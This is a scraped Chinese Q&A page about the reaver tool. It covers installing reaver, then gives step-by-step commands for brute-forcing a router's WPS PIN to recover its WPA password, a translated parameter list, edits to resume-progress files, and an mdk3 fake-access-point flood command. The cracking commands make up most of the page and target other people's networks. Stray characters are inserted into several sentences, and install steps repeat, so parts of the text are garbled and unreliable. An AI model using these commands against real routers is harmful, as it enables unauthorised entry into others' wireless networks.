導航:首頁 > 程序命令 > reaver命令

reaver命令

發布時間:2023-05-15 02:25:08

❶ BT5怎麼安裝reaver

可按下面的步驟實施:
首先,通過官網下載reaver;
第二,通過BT5下載得到,可以先保存在桌面;
第三,進行命令執行:
cd /DeskTop
查找軟體,可通過命令ls查看reaver是否存在,存在則打開reaver文件夾
解壓文件:
tar -zxvf /DeskTop/reaver-1.4.tar.gz
進入文件:
cd /reaver-1.4/src
通過命令ls查找configure文件
執行該文件安裝:
./configure
然後通過命令執行:
make && make install
第四,檢查是否安裝成功:
輸入命令:reaver –help
第五,完成reaver安裝

linux reaver怎麼用

需要工具:reaver
原理:窮舉PIN碼以攻灶寬破無線路由器的安全防護
安裝:
下載源碼
從這個網址下載reaver源代碼http://code.google.com/p/reaver-wps
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

解壓
tar-xzvf reaver-1.4.tar.gz

安裝必要的軟體依賴庫和工具
在您編譯reaver前需要先安裝pcaplib等工具,後面還需要aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

編譯和安裝

配置和編譯Reaver

cd reaver-1.4
cd src
./configure
make
下載aircrack-ng源代碼並編譯
從Ubuntu12.04版本開始aircrack-ng不再被包含在版本軟體倉庫中,不過我們可以從網上下載它的源代碼進行編譯安裝。如果aircrack-ng已經存在,則不必安裝。./configure
make
sudo install
解壓 tar -xzvf reaver-1.4.tar.gz

安裝必要的軟體依賴庫和工具

在您編譯 reaver前需要先安裝 pcaplib等工具,後面還需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

編譯和安裝

配置和編隱彎亮譯 Reaver
cd reaver-1.4 cd src ./configure make
安裝 Reaver
sudo make install

方法:

1 輸入:airmon-ng start wlan0 開啟監聽模式 (屏幕顯示 載入8187L驅動成功–一次就載入成功啊!)
2 輸入:wash -i mon0 -C 查看所有開啟WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要PJ的目標路由MAC.
3 輸入:airomp-ng mon0 網卡以混雜模式掃描所有頻道—並顯示所有AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等…..),按Ctrl+C,結束掃描.
注:如果你已知鬧沖對方無線路由信息 第2,第3步 可省略!
4 輸入:reaver -i mon0 -b MAC -a -S -vv 開始窮舉pin碼
注:隨時可以按CTRL+C退出保存進程,下次按下游標控制鍵「上」鍵然後回車,進程可繼續。
實戰我輸入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只見屏幕飛閃……爽啊!

reaver 參數詳解

必須參數

-i, –interface=<wlan> Name of the monitor-mode interface to use
網卡的監視介面,通常是mon0
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址
Optional Arguments: 可選參數
-m, –mac=<mac> MAC of the host system
指定本機MAC地址
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信號的頻道,如果不指定會自動掃描
-o, –out-file=<file> Send output to a log file [stdout]
輸出日誌文件
-s, –session=<file> Restore a previous session file
恢復進度文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery
pin成功後執行命令
-D, –daemonize Daemonize reaver
設置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
對目標AP自動檢測高級參數
-f, –fixed Disable channel hopping
禁止頻道跳轉
-5, –5ghz Use 5GHz 802.11 channels
使用5G頻道
-v, –verbose Display non-critical warnings (-vv for more)
顯示不重要警告信息 -vv 可以顯示更多
-q, –quiet Only display critical messages
只顯示關鍵信息
-h, –help Show help
顯示幫助
Advanced Options:高級選項
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin碼
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin間延時,默認1秒
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP鎖定WPS後等待時間
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次數
Reaver 參數
—天天
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10次意外失敗後等待時間,默認0秒
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
每x次pin後等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5]
收包超時,默認5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7超時,默認0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)

不連入AP(連入過程必須有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不發送NACK信息(如果一直pin不動,可以嘗試這個參數)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH關鍵值提高速度(推薦使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目標AP報告的鎖定狀態
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每當收到EAP失敗包就終止WPS進程
-n, –nack Target AP always sends a NACK [Auto]
對目標AP總是發送NACK,默認自動
-w, –win7 Mimic a Windows 7 registrar [False]
模擬win7注冊,默認關閉
Ps:影響到無線的因素很多,所以各參數之間的配合很重要,當然,最關鍵的還是取決於信號。
原理詳細:
什麼是PIN碼?
印在無線路由器設備標簽上的一組8位數字字元串,無線路由器管理界面中當然也會存在並可更改。
PIN碼有什麼用?
在無線網卡的配套管理軟體(如TP-LINK的QSS軟體)里輸入無線路由器設備上的那8位數字字元串就可以成功登錄該已被加密的無線路由器。
窮舉PIN碼是什麼意思?
既然知道了無線路由器PIN值的范圍(8位純數字),且目前大部分設備的WPS是呈開啟狀態的,那麼窮舉PIN碼以攻破無線路由器的安全防護這一暴力行為就有了*理論*可行性

❸ cdlinux下reaver1.4怎麼修改wpc文件

在破解的過程當中並不是每次都能達到效果,還有虛擬機死機、網卡無故掉線等突發事件,這時有的朋友使用的live cd Linux就不能保存pin碼進度,導致從頭開始,雖然是11000個pin碼。。。

今天說說reaver保存的pin碼進度保存文件的修改

reaver1.3版本的mac.wpc是保存在 /etc/reaver/mac.wpc

1.4版:保掘粗餘存在 /usr/local/etc/reaver/mac.wpc

打開wpc文件大家會發現是一些數字排列,判滾這就是reaver pin碼的進度和順序,但對我們有用的只有前三行。

第一行是4位數字是:從何處開始或者已經pin出前四的話,顯示在這里

第二行是3位數字:正在pin後3位(前提是前四已經pin出才會出現)

第三行是1位數字:如果前四已經pin出,後三沒pin出將顯示數字1,2是已經pin出結果

知道了這3行的具體意思,那麼對於上面說的情況就有了用武之地,包括從起、ap關機等

不管是用命令還是圖形,每pin一個在上述目錄中都會形成相應mac的wpc,通過修改每次記錄的幾行數字,可以提高很高的效率

例如:

上次pin到6500,還沒確認前四的情況下,直接修改對應mac的凳源wpc的第一行為6500,他會繼續6500開始pin,但每次要多加幾位數,有時是4有時是6,所以從6500開始不會漏碼

再說pin出前四的情況,這時不用修改wpc,使用命令可以直接確認的前四開始,當然你已經記下了前四

命令:reaver -i mon0 -b mac -p 前四(這個命令還可以-p 8位真實pin碼,應對於對方改了psk,可以直接出密碼)

圖形:只要在開始前勾選-p這個參數 和已知的前四或者8位,一樣的效果

因為每個系統獲取的管理許可權方式不同,所以命令也不一樣,請查看相應的教程,這里說的都是獲得了root許可權下操作的

因為一直不用xiaopan和cdlinux,所以就沒截圖

❹ 過時的wifi破解工具

之前我們講過了fluxion和aircrack破解wifi的方法

其實還有很多的wifi破解方式,不妨都試試。知曉每一個工具的優缺點,在合適的情境下去選擇最適合的方法

不幸的是下面講的這些破解方法基本已經成了古董了,只可遠觀而不可褻玩焉。

因為已經不怎麼管用了...

如果想了解wifi歷史的人可以繼續接著看下去,其他的嘛就快點去看其他文章吧

弄這么多不能用的wifi有什麼用呢?之後我們在知道釣魚wifi的時候會用到,這里我們先講一下

mdk3 wlan1 b -f FakeAPName.txt -c 2

只需要這么一句話

下面開始我的失敗嘗試了,願意看的請留下聽我講述歷史...

其實看看也好,可以避免你們繼續這樣失敗的嘗試,少浪費一些時間

現在路由器防pin真的是防的很好,我pin了至少30次,只pin出來過機房的很老的一台路由器,其他的總是被pin死,看來這11000次也並不想想像中那樣脆弱。這是我做完這次實驗的感受

reaver是通過路由器上一個叫做wps的功能來實現攻擊的,WPS是許多路由器上都有的一個功能,可以為用戶提供簡單的配置過程,它與設備中硬編碼保存的一個PIN碼綁定在帆纖一起。Reaver利用的就是PIN碼的一個缺陷,最終的結果就是,只要有足夠的時間,它就能破解WPA或WPA2的密碼。

根據pin碼破解的原理,可以看到只需要枚舉11000種情況就會必然破解出pin碼,從而通過pin得到wifi密碼。 具體的為什麼是11000種情況呢?

現在開始實現

1.將網卡調到監聽模式

打開終端輸入 airmon-ng start wlan0

2.掃描開啟wps的路由器。

輸入 wash -i wlan0mon

WPS Locked為No的就是開啟wps服務的路由器,都可以嘗試攻擊

3.找到了開啟WPS的wifi,接下來咱們就可以歷燃進行pin碼爆破,下面主要說一下reaver的參數。

reaver 命令:

reaver -i mon0 -b mac -S -v

示例:

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)

應因狀況調整參數(-c後面都已目標頻道為1作為例子)

選擇之前掃描出來的開啟WPS的wifi,選擇一個進行破解。

輸入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4

在窮舉的過程中,reaver會生成以路由mac地址為名的wpc文件,這個文件在kali系統中/etc/reaver/文件夾下。

一時半會pin不出來,過段時間pin的時候命令加參數 -s file.wpc,就會根據之前的進度繼續pin。

最後pin完最後會顯示WPS PIN(正確的pin碼)和WPA PSK(wifi密碼),同時如果WPS功能沒關,pin碼沒修改,無論怎樣修改密碼,都可以通過pin碼獲取wifi密碼: reaver -i wlan0mon -b mac -p pin 碼,來再次得到密碼

一般pin的過快,會把路由器pin死,所以 一般還會加上-d5 -t5參數 ,添加5秒延時,當然數值可以自己改。我添加了也照樣被pin的死死的。不行了這個軟體

很看好他,來試一下

1.打開終端輸入wifite

2.我選擇了all

3.結果一個也沒整出來,他也是用的wps的來破解,現在用wps針對除了很老的路由器,其他的都不是很好辦了

圖形化界面,大家一看就會懂, 先選擇網卡,掃描,破解

說一下主界面的右下角有一個 toolbox工具箱

試試

破解不好用,而且一打開他整個虛擬機都變得有些卡,破解的進度條根本肢轎虛不走

不推薦

我們來試一下他的這些附件

也都不管用,不知道是不是因為使用了https的緣故,反正他現在肯定是out了

參考的一些網站

七夜

freebuf 

閱讀全文

與reaver命令相關的資料

熱點內容
淮南程序員接私活項目 瀏覽:482
怎樣加密自己的密碼 瀏覽:527
安卓怎麼關許可權保護隱私 瀏覽:390
海牛微視app怎麼用 瀏覽:70
單片機怎樣選變壓器 瀏覽:829
癌症pdf 瀏覽:725
雲伺服器鏡像批量部署環境 瀏覽:683
安卓手機瀏覽器能訪問什麼網站 瀏覽:254
找不到網站的伺服器ip地址該如何解決 瀏覽:743
演算法十個數降序排列 瀏覽:95
基於單片機的老年人健康監測系統 瀏覽:706
python入門經典pdf下載 瀏覽:17
東芝變頻2p空調壓縮機 瀏覽:227
自家wifi怎麼能加密 瀏覽:644
紅米k40加密門禁卡 瀏覽:847
什麼樣的源碼好看 瀏覽:156
手機主伺服器有什麼用 瀏覽:612
程序編寫命令 瀏覽:597
android發送心跳包 瀏覽:385
指標源碼和原理 瀏覽:700